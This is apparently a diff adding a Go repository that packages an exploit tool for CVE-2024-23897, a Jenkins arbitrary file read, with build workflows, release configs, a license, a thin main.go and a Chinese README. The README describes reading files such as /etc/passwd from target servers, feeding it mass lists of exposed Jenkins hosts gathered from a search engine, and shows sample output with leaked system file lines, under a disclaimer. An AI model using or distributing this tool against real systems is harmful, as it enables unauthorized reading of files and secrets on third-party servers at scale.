🎉 CVE-2024-23897

.github/workflows/release-binary.yml

@@ -0,0 +1,69 @@
+name: 🎉 Release Binary
+
+on:
+  push:
+    tags:
+      - v*
+  workflow_dispatch:
+
+jobs:
+  build-mac:
+    runs-on: macos-latest
+    steps:
+      - name: Code checkout
+        uses: actions/checkout@v3
+        with:
+          fetch-depth: 0
+      - name: Set up Go
+        uses: actions/setup-go@v4
+        with:
+          go-version: 1.21.x
+      - name: Run GoReleaser
+        uses: goreleaser/goreleaser-action@v4
+        with:
+          version: latest
+          args: release -f .goreleaser/mac.yml --rm-dist
+          workdir: .
+        env:
+          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+
+  build-linux:
+    runs-on: ubuntu-latest
+    steps:
+      - name: Code checkout
+        uses: actions/checkout@v3
+        with:
+          fetch-depth: 0
+      - name: Set up Go
+        uses: actions/setup-go@v4
+        with:
+          go-version: 1.21.x
+
+      - name: Run GoReleaser
+        uses: goreleaser/goreleaser-action@v4
+        with:
+          version: latest
+          args: release -f .goreleaser/linux.yml --rm-dist
+          workdir: .
+        env:
+          GITHUB_TOKEN: "${{ secrets.GITHUB_TOKEN }}"
+
+  build-windows:
+    runs-on: windows-latest
+    steps:
+      - name: Code checkout
+        uses: actions/checkout@v3
+        with:
+          fetch-depth: 0
+      - name: Set up Go
+        uses: actions/setup-go@v4
+        with:
+          go-version: 1.21.x
+      - name: Run GoReleaser
+        uses: goreleaser/goreleaser-action@v4
+        with:
+          version: latest
+          args: release -f .goreleaser/windows.yml --rm-dist
+          workdir: .
+        env:
+          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}

.github/workflows/release-test.yml

@@ -0,0 +1,71 @@
+name: 🔨 Release Test
+
+on:
+  pull_request:
+    paths:
+      - '**.go'
+      - '**.mod'
+      - '**.yml'
+  workflow_dispatch:
+
+jobs:
+  release-test-mac:
+    runs-on: macos-latest
+    steps:
+      - name: "Check out code"
+        uses: actions/checkout@v3
+        with:
+          fetch-depth: 0
+
+      - name: Set up Go
+        uses: actions/setup-go@v4
+        with:
+          go-version: 1.21.x
+
+      - name: release test
+        uses: goreleaser/goreleaser-action@v4
+        with:
+          args: "release --clean --snapshot -f .goreleaser/mac.yml"
+          version: latest
+          workdir: .
+
+  release-test-linux:
+    runs-on: ubuntu-latest
+    steps:
+      - name: "Check out code"
+        uses: actions/checkout@v3
+        with:
+          fetch-depth: 0
+
+      - name: Set up Go
+        uses: actions/setup-go@v4
+        with:
+          go-version: 1.21.x
+
+
+      - name: release test
+        uses: goreleaser/goreleaser-action@v4
+        with:
+          args: "release --clean --snapshot -f .goreleaser/linux.yml"
+          version: latest
+          workdir: .
+
+  release-test-windows:
+    runs-on: windows-latest
+    steps:
+      - name: "Check out code"
+        uses: actions/checkout@v3
+        with:
+          fetch-depth: 0
+
+      - name: Set up Go
+        uses: actions/setup-go@v4
+        with:
+          go-version: 1.21.x
+
+      - name: release test
+        uses: goreleaser/goreleaser-action@v4
+        with:
+          args: "release --clean --snapshot -f .goreleaser/windows.yml"
+          version: latest
+          workdir: .

.gitignore

@@ -0,0 +1,6 @@
+*.json
+*.DS_Store
+.idea/
+test/
+output/
+

.goreleaser/linux.yml

@@ -0,0 +1,25 @@
+env:
+  - GO111MODULE=on
+before:
+  hooks:
+    - go mod tidy
+project_name: CVE-2024-23897
+builds:
+  - id: CVE-2024-23897-linux
+    binary: '{{ .ProjectName }}'
+    env:
+      - CGO_ENABLED=0
+    main: ./cmd/CVE-2024-23897/CVE-2024-23897.go
+    goos:
+      - linux
+    goarch:
+      - amd64
+      - arm64
+      - arm
+
+archives:
+  - format: zip
+    name_template: '{{ .ProjectName }}_{{ .Version }}_{{ if eq .Os "darwin" }}macOS{{ else }}{{ .Os }}{{ end }}_{{ .Arch }}'
+
+checksum:
+  name_template: "{{ .ProjectName }}-linux-checksums.txt"

.goreleaser/mac.yml

@@ -0,0 +1,24 @@
+env:
+  - GO111MODULE=on
+before:
+  hooks:
+    - go mod tidy
+project_name: CVE-2024-23897
+builds:
+  - id: CVE-2024-23897-darwin
+    binary: '{{ .ProjectName }}'
+    env:
+      - CGO_ENABLED=0
+    main: ./cmd/CVE-2024-23897/CVE-2024-23897.go
+    goos:
+      - darwin
+    goarch:
+      - amd64
+      - arm64
+archives:
+  - format: zip
+    name_template: '{{ .ProjectName }}_{{ .Version }}_{{ if eq .Os "darwin" }}macOS{{ else }}{{ .Os }}{{ end }}_{{ .Arch }}'
+
+
+checksum:
+  name_template: "{{ .ProjectName }}-mac-checksums.txt"

.goreleaser/windows.yml

@@ -0,0 +1,24 @@
+env:
+  - GO111MODULE=on
+before:
+  hooks:
+    - go mod tidy
+project_name: CVE-2024-23897
+builds:
+  - id: CVE-2024-23897-windows
+    env:
+      - CGO_ENABLED=0
+    binary: '{{ .ProjectName }}'
+    main: ./cmd/CVE-2024-23897/CVE-2024-23897.go
+    goos:
+      - windows
+    goarch:
+      - "amd64"
+      - "386"
+      - "arm"
+archives:
+  - format: zip
+    name_template: '{{ .ProjectName }}_{{ .Version }}_{{ if eq .Os "darwin" }}macOS{{ else }}{{ .Os }}{{ end }}_{{ .Arch }}'
+
+checksum:
+  name_template: "{{ .ProjectName }}-windows-checksums.txt"

LICENSE

@@ -0,0 +1,21 @@
+MIT License
+
+Copyright (c) 2024 wjlin0
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.

README.md

@@ -0,0 +1,105 @@
+<h4 align="center"> CVE-2024-23897 - Jenkins 任意文件读取 利用工具 </h4>
+<p align="center">
+<img src="https://img.shields.io/github/go-mod/go-version/wjlin0/CVE-2024-23897?filename=go.mod" alt="">
+<a href="https://github.com/wjlin0/CVE-2024-23897/releases/"><img src="https://img.shields.io/github/release/wjlin0/CVE-2024-23897" alt=""></a> 
+<a href="https://github.com/wjlin0/CVE-2024-23897" ><img alt="GitHub Repo stars" src="https://img.shields.io/github/stars/wjlin0/CVE-2024-23897"></a>
+<a href="https://github.com/wjlin0/CVE-2024-23897/releases"><img src="https://img.shields.io/github/downloads/wjlin0/CVE-2024-23897/total" alt=""></a> 
+<a href="https://github.com/wjlin0/CVE-2024-23897"><img src="https://img.shields.io/github/last-commit/wjlin0/CVE-2024-23897" alt=""></a> 
+<a href="https://wjlin0.com/"><img src="https://img.shields.io/badge/wjlin0-blog-green" alt=""></a>
+</p>
+
+# 安装
+
+CVE-2024-23897 需要`go 1.21`才能完成安装 执行以下命令
+
+```shell
+go install github.com/wjlin0/CVE-2024-23897/cmd/CVE-2024-23897@latest
+```
+或者
+安装完成的二进制文件在[release](https://github.com/wjlin0/CVE-2024-23897/releases)中下载
+- [macOS-arm64](https://github.com/wjlin0/CVE-2024-23897/releases/download/v1.0.0/CVE-2024-23897_1.0.0_macOS_arm64.zip)
+
+- [macOS-amd64](https://github.com/wjlin0/CVE-2024-23897/releases/download/v1.0.0/CVE-2024-23897_1.0.0_macOS_amd64.zip)
+
+- [linux-amd64](https://github.com/wjlin0/CVE-2024-23897/releases/download/v1.0.0/CVE-2024-23897_1.0.0_linux_amd64.zip)
+
+- [windows-amd64](https://github.com/wjlin0/CVE-2024-23897/releases/download/v1.0.0/CVE-2024-23897_1.0.0_windows_amd64.zip)
+
+- [windows-386](https://github.com/wjlin0/CVE-2024-23897/releases/download/v1.0.0/CVE-2024-23897_1.0.0_windows_386.zip)
+
+
+# 使用
+```shell
+CVE-2024-23897 -help
+```
+```text
+CVE-2024-23897 is a tool for scanning for CVE-2024-23897
+
+Usage:
+  CVE-2024-23897 [flags]
+
+Flags:
+INPUT:
+   -url, -u string[]       URL to scan. (e.g. -u https://example.com)
+   -list string[]          File containing list of URLs to scan. (e.g. -list list.txt)
+   -f, -filename string[]  The file path that needs to be read. (e.g. -f /etc/passwd)
+
+OUTPUT:
+   -no-color  Don't Use colors in output
+
+DEBUG:
+   -debug                           Enable debugging
+   -p, -proxy string[]              list of http/socks5 proxy to use (comma separated or file input)
+   -irt, -input-read-timeout value  timeout on input read (default 3m0s)
+   -no-stdin                        disable stdin processing
+
+LIMIT:
+   -timeout int          time to wait in seconds before timeout (default 10)
+   -t, -thread int       Number of concurrent threads (default 10)
+   -rl, -rate-limit int  Rate limit for enumeration speed (n req/sec) (default -1)
+
+
+Examples:
+Run CVE-2024-23897 on a single targets
+        $ CVE-2024-23897 -url https://example.com
+Run CVE-2024-23897 on a list of targets
+        $ CVE-2024-23897 -list list.txt
+Run CVE-2024-23897 on a single targets with filenames
+        $ CVE-2024-23897 -url https://example.com -f /etc/passwd -f /etc/hostname
+Run CVE-2024-23897 on a single targets a proxy server
+        $ CVE-2024-23897 -url https://example.com  -proxy http://127.0.0.1:7890
+Run CVE-2024-23897 on uncovering Jenkins
+        $ pathScan -ue 'quake' -uq 'app: "Jenkins"' -uc -silent | CVE-2024-23897
+```
+
+use pathScan to collect targets and pass them to CVE-2024-23897 via standard input
+
+```shell
+pathScan -ue quake -uq 'app:"springboot"' -uc -silent -ul 200 | CVE-2024-23897
+```
+> To protect your privacy, I have deleted some outputs
+```text
+➜ ~ pathScan -ue 'quake' -uq 'app: "Jenkins"' -uc -silent | CVE-2024-23897
+
+   _______    ________    ___  ____ ___  __ __       ___  _____ ____  ____ _____
+  / ____| |  / / ____/   |__ \/ __ |__ \/ // /      |__ \|__  /( __ )/ __ /__  /
+ / /    | | / / __/________/ / / / __/ / // /_________/ / /_ </ __  / /_/ / / /
+/ /___  | |/ / /__/_____/ __/ /_/ / __/__  __/_____/ __/___/ / /_/ /\__, / / /
+\____/  |___/_____/    /____\____/____/ /_/       /____/____/\____//____/ /_/
+
+
+Jenkins 任意文件读取漏洞
+						wjlin0.com
+
+慎用。你要为自己的行为负责
+开发者不承担任何责任，也不对任何误用或损坏负责.
+
+[INF] Loaded 50 targets from input
+[INF] Read /etc/passwd file first line
+[CVE-2024-23897] https://example.com /etc/hostname - cc0c73d0f754
+[CVE-2024-23897] https://example.com /etc/passwd - root:x:0:0:root:/root:/bin/bash
+[CVE-2024-23897] https://example.com /etc/passwd - root:x:0:0:root:/root:/bin/bash
+[CVE-2024-23897] https://example.com /etc/hostname - debian
+[CVE-2024-23897] https://example.com /etc/passwd - root:x:0:0:root:/root:/bin/bash
+[INF] took 92.75 seconds with 13 successful requests
+```

cmd/CVE-2024-23897/CVE-2024-23897.go

@@ -0,0 +1,18 @@
+package main
+
+import (
+	"github.com/projectdiscovery/gologger"
+	"github.com/wjlin0/CVE-2024-23897/pkg/runner"
+)
+
+func main() {
+
+	newRunner, err := runner.NewRunner(runner.ParseOptions())
+	if err != nil {
+		gologger.Fatal().Msgf("new runner error: %s", err.Error())
+		return
+	}
+	if err := newRunner.RunEnumeration(); err != nil {
+		gologger.Fatal().Msgf("run enumeration error: %s", err.Error())
+	}
+}